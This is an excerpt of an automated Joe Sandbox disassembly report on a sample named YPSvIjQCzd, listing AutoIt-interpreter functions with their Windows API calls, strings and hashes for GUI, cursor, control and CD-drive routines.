Opcode ID: 9f0a579ff64f525338123e1d2c1be63a0d9a01780d99a5c810ac5a8295f1769e
Instruction ID: 93fa5be48a14dbaa8933254d36e3dc8df19a6b8df1958e94a0e0c107008b9712
Opcode Fuzzy Hash: 9f0a579ff64f525338123e1d2c1be63a0d9a01780d99a5c810ac5a8295f1769e
Instruction Fuzzy Hash: 9AB18971604340AFDB04DF64C849B6ABBE5FF88319F00891DF9999B2A1D775EC48CB92

Function 007D27D9 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 286windowtimeCOMMON

Download Yara Rule

APIs

SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 007D28BC
GetSystemMetrics.USER32(00000007), ref: 007D28C4
SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 007D28EF
GetSystemMetrics.USER32(00000008), ref: 007D28F7
GetSystemMetrics.USER32(00000004), ref: 007D291C
SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 007D2939
AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 007D2949
CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 007D297C
SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 007D2990
GetClientRect.USER32(00000000,000000FF), ref: 007D29AE
GetStockObject.GDI32(00000011), ref: 007D29CA
SendMessageW.USER32(00000000,00000030,00000000), ref: 007D29D5

Part of subcall function 007D2344: GetCursorPos.USER32(?), ref: 007D2357
Part of subcall function 007D2344: ScreenToClient.USER32(008967B0,?), ref: 007D2374
Part of subcall function 007D2344: GetAsyncKeyState.USER32(00000001), ref: 007D2399
Part of subcall function 007D2344: GetAsyncKeyState.USER32(00000002), ref: 007D23A7

SetTimer.USER32(00000000,00000000,00000028,007D1256), ref: 007D29FC

Strings

AutoIt v3 GUI, xrefs: 007D2974

Memory Dump Source

Source File: 00000001.00000002.1344759190.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000001.00000002.1344687893.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345074943.00000000008EF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345092206.00000000008F0000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7d0000_YPSvIjQCzd.jbxd

Similarity

API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
String ID: AutoIt v3 GUI
API String ID: 1458621304-248962490
Opcode ID: dd0ffad305c7fe37143a3bd6382fd1ce84e28d6c96d891d4216887b68b39d6eb
Instruction ID: 10146408830e401e48ffbea556cb4452dd0f03854df31b7aa609b9b2c7619762
Opcode Fuzzy Hash: dd0ffad305c7fe37143a3bd6382fd1ce84e28d6c96d891d4216887b68b39d6eb
Instruction Fuzzy Hash: E8B17F7160020AEFDB14DFA8DC45BAE7BB4FB58315F11822AFA15E7391DB389852CB50

Function 008346D6 Relevance: 33.4, APIs: 14, Strings: 5, Instructions: 179COMMON

Download Yara Rule

APIs

_wcscpy.LIBCMT ref: 0083473C
_wcscmp.LIBCMT ref: 00834747
_wcscat.LIBCMT ref: 0083475D
_wcsstr.LIBCMT ref: 00834768
755A1560.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 00834784
_wcscat.LIBCMT ref: 008347CD
_wcscat.LIBCMT ref: 008347D4
_wcsncpy.LIBCMT ref: 008347FF

Strings

DefaultLangCodepage, xrefs: 008347E7
StringFileInfo\, xrefs: 00834757
\VarFileInfo\Translation, xrefs: 0083477C
04090000, xrefs: 008347BA
%u.%u.%u.%u, xrefs: 00834862

Memory Dump Source

Source File: 00000001.00000002.1344759190.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000001.00000002.1344687893.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345074943.00000000008EF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345092206.00000000008F0000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7d0000_YPSvIjQCzd.jbxd

Similarity

API ID: _wcscat$A1560_wcscmp_wcscpy_wcsncpy_wcsstr
String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
API String ID: 3483108802-1459072770
Opcode ID: 9c55181d42762c26dfc8dc8e9338556171aec65044afe254d53a32b70f05484e
Instruction ID: 779e112fd2eaae374e2608f1644cdffe7f064d8a64758b0da53a80715eb959e0
Opcode Fuzzy Hash: 9c55181d42762c26dfc8dc8e9338556171aec65044afe254d53a32b70f05484e
Instruction Fuzzy Hash: CB41F971600218FAE711B7648C4BEBF77ACFF45710F140166FA04E6283EB7DAA0157A5

Function 00854069 Relevance: 28.3, APIs: 3, Strings: 13, Instructions: 283windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 008540F6
SendMessageW.USER32(?,00001032,00000000,00000000), ref: 008541B6

Strings

SELECTALL, xrefs: 0085421D
GETSUBITEMCOUNT, xrefs: 00854141
SELECTINVERT, xrefs: 00854286
FINDITEM, xrefs: 00854329
GETSELECTEDCOUNT, xrefs: 00854199
ISSELECTED, xrefs: 008541C1
VIEWCHANGE, xrefs: 00854375
SELECT, xrefs: 00854250
GETSELECTED, xrefs: 008542E4
GETTEXT, xrefs: 0085415F
GETITEMCOUNT, xrefs: 00854128
SELECTCLEAR, xrefs: 00854235
DESELECT, xrefs: 008542A4

Memory Dump Source

Source File: 00000001.00000002.1344759190.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000001.00000002.1344687893.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345074943.00000000008EF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345092206.00000000008F0000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7d0000_YPSvIjQCzd.jbxd

Similarity

API ID: BuffCharMessageSendUpper
String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
API String ID: 3974292440-719923060
Opcode ID: 6619c35e2ec8e7cfe619fe36dbf89b8374c7bae9c3d4a04810ebbe99556320a6
Instruction ID: e10aee52443497fe8ea68f4abb681cbc7919889287054d7fefabba612bee0db3
Opcode Fuzzy Hash: 6619c35e2ec8e7cfe619fe36dbf89b8374c7bae9c3d4a04810ebbe99556320a6
Instruction Fuzzy Hash: ECA1BE30214315DBCB14EF20C855A6AB7A5FF84319F109869B99ADB3A2EB34EC49CB51

Function 008452F0 Relevance: 27.1, APIs: 18, Instructions: 124COMMON

Download Yara Rule

APIs

LoadCursorW.USER32(00000000,00007F89), ref: 00845309
LoadCursorW.USER32(00000000,00007F8A), ref: 00845314
LoadCursorW.USER32(00000000,00007F00), ref: 0084531F
LoadCursorW.USER32(00000000,00007F03), ref: 0084532A
LoadCursorW.USER32(00000000,00007F8B), ref: 00845335
LoadCursorW.USER32(00000000,00007F01), ref: 00845340
LoadCursorW.USER32(00000000,00007F81), ref: 0084534B
LoadCursorW.USER32(00000000,00007F88), ref: 00845356
LoadCursorW.USER32(00000000,00007F80), ref: 00845361
LoadCursorW.USER32(00000000,00007F86), ref: 0084536C
LoadCursorW.USER32(00000000,00007F83), ref: 00845377
LoadCursorW.USER32(00000000,00007F85), ref: 00845382
LoadCursorW.USER32(00000000,00007F82), ref: 0084538D
LoadCursorW.USER32(00000000,00007F84), ref: 00845398
LoadCursorW.USER32(00000000,00007F04), ref: 008453A3
LoadCursorW.USER32(00000000,00007F02), ref: 008453AE
GetCursorInfo.USER32(?), ref: 008453BE
GetLastError.KERNEL32(00000001,00000000), ref: 008453E9

Memory Dump Source

Source File: 00000001.00000002.1344759190.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000001.00000002.1344687893.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345074943.00000000008EF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345092206.00000000008F0000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7d0000_YPSvIjQCzd.jbxd

Similarity

API ID: Cursor$Load$ErrorInfoLast
String ID:
API String ID: 3215588206-0
Opcode ID: bbb2e94e34ec3a497228825c463f9f963fded0256d56d9db3ef66647ebcc9e01
Instruction ID: 8806bee9dda13626728896af35531e6234df47d77e8441ff0fd40c223a5cd406
Opcode Fuzzy Hash: bbb2e94e34ec3a497228825c463f9f963fded0256d56d9db3ef66647ebcc9e01
Instruction Fuzzy Hash: 49415270E04319ABDB109FBA8C4996EFEB8FF51B50B10452BE509E7291DAB89401CE65

Function 0082AA64 Relevance: 26.5, APIs: 14, Strings: 1, Instructions: 273windowtimeCOMMON

Download Yara Rule

APIs

GetClassNameW.USER32(?,?,00000100), ref: 0082AAA5
__swprintf.LIBCMT ref: 0082AB46
_wcscmp.LIBCMT ref: 0082AB59
SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 0082ABAE
_wcscmp.LIBCMT ref: 0082ABEA
GetClassNameW.USER32(?,?,00000400), ref: 0082AC21
GetDlgCtrlID.USER32(?), ref: 0082AC73
GetWindowRect.USER32(?,?), ref: 0082ACA9
GetParent.USER32(?), ref: 0082ACC7
ScreenToClient.USER32(00000000), ref: 0082ACCE
GetClassNameW.USER32(?,?,00000100), ref: 0082AD48
_wcscmp.LIBCMT ref: 0082AD5C
GetWindowTextW.USER32(?,?,00000400), ref: 0082AD82
_wcscmp.LIBCMT ref: 0082AD96

Part of subcall function 007F386C: _iswctype.LIBCMT ref: 007F3874

Strings

%s%u, xrefs: 0082AB40

Memory Dump Source

Source File: 00000001.00000002.1344759190.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000001.00000002.1344687893.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345074943.00000000008EF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345092206.00000000008F0000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7d0000_YPSvIjQCzd.jbxd

Similarity

API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_iswctype
String ID: %s%u
API String ID: 3744389584-679674701
Opcode ID: b923d95c00d2034c381cd13fffc1f2683b039a0434f1cd48768425cdf634cb2c
Instruction ID: 8a3fe453eaaed2cd7fbe7a3ebd5b373001cf217bada8273096c77e95c9530799
Opcode Fuzzy Hash: b923d95c00d2034c381cd13fffc1f2683b039a0434f1cd48768425cdf634cb2c
Instruction Fuzzy Hash: 70A1F271204726EFDB18DF24D884BAAF7E8FF44315F104629FA99C2191D734E985CB92

Function 0082B397 Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 249COMMON

Download Yara Rule

APIs

GetClassNameW.USER32(00000008,?,00000400), ref: 0082B3DB
_wcscmp.LIBCMT ref: 0082B3EC
GetWindowTextW.USER32(00000001,?,00000400), ref: 0082B414
CharUpperBuffW.USER32(?,00000000), ref: 0082B431
_wcscmp.LIBCMT ref: 0082B44F
_wcsstr.LIBCMT ref: 0082B460
GetClassNameW.USER32(00000018,?,00000400), ref: 0082B498
_wcscmp.LIBCMT ref: 0082B4A8
GetWindowTextW.USER32(00000002,?,00000400), ref: 0082B4CF
GetClassNameW.USER32(00000018,?,00000400), ref: 0082B518
_wcscmp.LIBCMT ref: 0082B528
GetClassNameW.USER32(00000010,?,00000400), ref: 0082B550
GetWindowRect.USER32(00000004,?), ref: 0082B5B9

Strings

ThumbnailClass, xrefs: 0082B4A3, 0082B523
@, xrefs: 0082B3BC

Memory Dump Source

Source File: 00000001.00000002.1344759190.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000001.00000002.1344687893.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345074943.00000000008EF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345092206.00000000008F0000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7d0000_YPSvIjQCzd.jbxd

Similarity

API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
String ID: @$ThumbnailClass
API String ID: 1788623398-1539354611
Opcode ID: f91fd282faac317fde46d4196e9ac6e3efe86f1fdf990ce4305d77d01e7287b6
Instruction ID: b404679af5871016edbdb453a2a75f1e4b32d0d27bc665830e17806d284347f8
Opcode Fuzzy Hash: f91fd282faac317fde46d4196e9ac6e3efe86f1fdf990ce4305d77d01e7287b6
Instruction Fuzzy Hash: CA81C07100931A9BDB04DF10E985FAA7BE8FF54314F088569FD85CA192DB38DD85CB61

Function 0082B1E0 Relevance: 26.4, APIs: 3, Strings: 12, Instructions: 105COMMON

Download Yara Rule

APIs

__wcsnicmp.LIBCMT ref: 0082B23F

Strings

[ACTIVE, xrefs: 0082B22C
CLASSNAME=, xrefs: 0082B27C
[LAST, xrefs: 0082B2EC
HANDLE=, xrefs: 0082B238
[HANDLE:, xrefs: 0082B24B
REGEXP=, xrefs: 0082B254
ALL, xrefs: 0082B2D3
[CLASS:, xrefs: 0082B28F
LAST, xrefs: 0082B204
ACTIVE, xrefs: 0082B21A
[ALL, xrefs: 0082B2E5
[REGEXPTITLE:, xrefs: 0082B267

Memory Dump Source

Source File: 00000001.00000002.1344759190.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000001.00000002.1344687893.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345074943.00000000008EF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345092206.00000000008F0000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7d0000_YPSvIjQCzd.jbxd

Similarity

API ID: __wcsnicmp
String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
API String ID: 1038674560-1810252412
Opcode ID: 56c0a73f6978f0e18b033495af458c657ce45fdf52bb894f4586fc5cf6a8c33d
Instruction ID: 707de7713310faa2b65cd2061a77a36918539135c9dfd48c56c16a0dbab07c5c
Opcode Fuzzy Hash: 56c0a73f6978f0e18b033495af458c657ce45fdf52bb894f4586fc5cf6a8c33d
Instruction Fuzzy Hash: CF318930A04319E6DB14FAA0DD47ABE77B8FF20750F64012AF4A2B12D2FF696E44C651

Function 0082C4C1 Relevance: 25.7, APIs: 17, Instructions: 169windowtimeCOMMON

Download Yara Rule

APIs

LoadIconW.USER32(00000063), ref: 0082C4D4
SendMessageW.USER32(?,00000080,00000000,00000000), ref: 0082C4E6
SetWindowTextW.USER32(?,?), ref: 0082C4FD
GetDlgItem.USER32(?,000003EA), ref: 0082C512
SetWindowTextW.USER32(00000000,?), ref: 0082C518
GetDlgItem.USER32(?,000003E9), ref: 0082C528
SetWindowTextW.USER32(00000000,?), ref: 0082C52E
SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 0082C54F
SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 0082C569
GetWindowRect.USER32(?,?), ref: 0082C572
SetWindowTextW.USER32(?,?), ref: 0082C5DD
GetDesktopWindow.USER32 ref: 0082C5E3
GetWindowRect.USER32(00000000), ref: 0082C5EA
MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 0082C636
GetClientRect.USER32(?,?), ref: 0082C643
PostMessageW.USER32(?,00000005,00000000,00000000), ref: 0082C668
SetTimer.USER32(?,0000040A,00000000,00000000), ref: 0082C693

Memory Dump Source

Source File: 00000001.00000002.1344759190.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000001.00000002.1344687893.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345074943.00000000008EF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345092206.00000000008F0000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7d0000_YPSvIjQCzd.jbxd

Similarity

API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
String ID:
API String ID: 3869813825-0
Opcode ID: 64da35dd0ded3efa6f4ff2edea346b50425979d93f38b26fcea693045e6a4cd0
Instruction ID: f986e20b5ab16262432010e9aad975299b8016124eea9770a6bf95782ebcd2e4
Opcode Fuzzy Hash: 64da35dd0ded3efa6f4ff2edea346b50425979d93f38b26fcea693045e6a4cd0
Instruction Fuzzy Hash: EC515A70900719AFDB20AFA8DE89B6FBBF5FF04705F004928E686E25A1D775E944CB50

Function 0085A428 Relevance: 24.7, APIs: 12, Strings: 2, Instructions: 205windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0085A4C8
DestroyWindow.USER32(?,?), ref: 0085A542

Part of subcall function 007D7D2C: _memmove.LIBCMT ref: 007D7D66

CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 0085A5BC
SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 0085A5DE
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0085A5F1
DestroyWindow.USER32(00000000), ref: 0085A613
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,007D0000,00000000), ref: 0085A64A
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0085A663
GetDesktopWindow.USER32 ref: 0085A67C
GetWindowRect.USER32(00000000), ref: 0085A683
SendMessageW.USER32(00000000,00000418,00000000,?), ref: 0085A69B
SendMessageW.USER32(00000000,00000421,?,00000000), ref: 0085A6B3

Part of subcall function 007D25DB: GetWindowLongW.USER32(?,000000EB), ref: 007D25EC

Strings

0, xrefs: 0085A4DE
tooltips_class32, xrefs: 0085A5B5, 0085A643

Memory Dump Source

Source File: 00000001.00000002.1344759190.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000001.00000002.1344687893.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345074943.00000000008EF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345092206.00000000008F0000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7d0000_YPSvIjQCzd.jbxd

Similarity

API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
String ID: 0$tooltips_class32
API String ID: 1297703922-3619404913
Opcode ID: fd6e5a87aee9307880bc73e94bd625a9017edc60e817bbf9d9c9e090accd3226
Instruction ID: 1f1dd210656bcb20bc23a0ce54ce6265d135af4507635025eb9493ab4c1952c9
Opcode Fuzzy Hash: fd6e5a87aee9307880bc73e94bd625a9017edc60e817bbf9d9c9e090accd3226
Instruction Fuzzy Hash: 36719C74140205AFD724DF28DC89F667BE6FBA8305F08462DF985D72A1E774E90ACB12

Function 00854619 Relevance: 23.0, APIs: 2, Strings: 11, Instructions: 251windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 008546AB
SendMessageW.USER32(?,00001105,00000000,00000000), ref: 008546F6

Strings

GETSELECTED, xrefs: 00854806
EXPAND, xrefs: 008547A8
EXISTS, xrefs: 0085475F
GETTEXT, xrefs: 00854849
CHECK, xrefs: 00854716
ISCHECKED, xrefs: 00854879
GETITEMCOUNT, xrefs: 008547D8
UNCHECK, xrefs: 008548D2
COLLAPSE, xrefs: 0085473C
GETTOTALCOUNT, xrefs: 008546DD
SELECT, xrefs: 008548A7

Memory Dump Source

Source File: 00000001.00000002.1344759190.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000001.00000002.1344687893.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345074943.00000000008EF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345092206.00000000008F0000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7d0000_YPSvIjQCzd.jbxd

Similarity

API ID: BuffCharMessageSendUpper
String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
API String ID: 3974292440-4258414348
Opcode ID: cd723f47bdef5e658a40cbb57f9e8f60a503de0220fa7d4eb0362bc83540ff54
Instruction ID: 1bf1b7738f0f6b5bed43b8f14fb1c7054025130b6f170b46216a42638bc303be
Opcode Fuzzy Hash: cd723f47bdef5e658a40cbb57f9e8f60a503de0220fa7d4eb0362bc83540ff54
Instruction Fuzzy Hash: A2917E34204315DBCB14EF20C455A6ABBA1FF95318F00946DBD969B3A3DB34ED89CB81

Function 0085BAB8 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 197windowlibraryCOMMON

Download Yara Rule

APIs

LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 0085BB6E
LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,00859431), ref: 0085BBCA
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0085BC03
LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 0085BC46
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0085BC7D
FreeLibrary.KERNEL32(?), ref: 0085BC89
ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0085BC99
DestroyCursor.USER32(?), ref: 0085BCA8
SendMessageW.USER32(?,00000170,00000000,00000000), ref: 0085BCC5
SendMessageW.USER32(?,00000064,00000172,00000001), ref: 0085BCD1

Part of subcall function 007F313D: __wcsicmp_l.LIBCMT ref: 007F31C6

Strings

.dll, xrefs: 0085BB27
.icl, xrefs: 0085BAE4
.exe, xrefs: 0085BB04

Memory Dump Source

Source File: 00000001.00000002.1344759190.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000001.00000002.1344687893.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345074943.00000000008EF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345092206.00000000008F0000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7d0000_YPSvIjQCzd.jbxd

Similarity

API ID: Load$Image$LibraryMessageSend$CursorDestroyExtractFreeIcon__wcsicmp_l
String ID: .dll$.exe$.icl
API String ID: 3907162815-1154884017
Opcode ID: e5b6b559aa61355dafccdb29d3a51e7b0eebea6195994515d35495e8bc30bfa0
Instruction ID: b5bb297a45a541d33cf194421e9637435944df3e7489fd9ca2fb99247816bdd5
Opcode Fuzzy Hash: e5b6b559aa61355dafccdb29d3a51e7b0eebea6195994515d35495e8bc30bfa0
Instruction Fuzzy Hash: 3A61E071500619FAEB14DF64CC49BBA7BA8FB18722F104119FE15D61C1DB78AD88DBA0

Function 0083A5BD Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 138COMMON

Download Yara Rule

APIs

Part of subcall function 007D9997: __itow.LIBCMT ref: 007D99C2
Part of subcall function 007D9997: __swprintf.LIBCMT ref: 007D9A0C

CharLowerBuffW.USER32(?,?), ref: 0083A636
GetDriveTypeW.KERNEL32 ref: 0083A683
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0083A6CB
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0083A702
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0083A730

Part of subcall function 007D7D2C: _memmove.LIBCMT ref: 007D7D66

Strings

open , xrefs: 0083A692
type cdaudio alias cd wait, xrefs: 0083A6AE
closed, xrefs: 0083A64A, 0083A653
open, xrefs: 0083A65D
close, xrefs: 0083A63C
set cd door , xrefs: 0083A6D1
wait, xrefs: 0083A6ED
close cd wait, xrefs: 0083A71B

Memory Dump Source

Source File: 00000001.00000002.1344759190.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000001.00000002.1344687893.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
